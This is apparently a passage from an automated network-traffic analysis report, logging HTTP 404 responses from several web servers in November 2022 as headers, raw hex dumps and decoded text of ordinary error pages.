63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 21 Nov 2022 18:22:59 GMTContent-Type: text/html; charset=utf-8Content-Length: 39481Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 21 Nov 2022 18:23:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 39481Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:23:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 01 May 2020 23:50:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:23:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 01 May 2020 23:50:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:23:11 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 01 May 2020 23:50:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:23:14 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 01 May 2020 23:50:34 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; marg
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 21 Nov 2022 18:23:32 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 21 Nov 2022 18:23:37 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 21 Nov 2022 18:23:39 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 21 Nov 2022 18:23:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0
